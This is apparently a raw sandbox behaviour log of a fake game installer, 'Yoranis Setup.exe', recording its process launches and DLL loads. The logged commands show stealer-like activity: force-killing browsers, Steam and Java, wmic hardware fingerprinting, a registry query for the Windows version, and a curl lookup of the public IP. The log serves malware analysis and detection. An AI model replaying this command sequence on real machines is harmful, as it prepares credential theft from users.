Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,3448241921201964185,6892278070021911797,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2412 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dxil.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeSection loaded: winhttp.dll
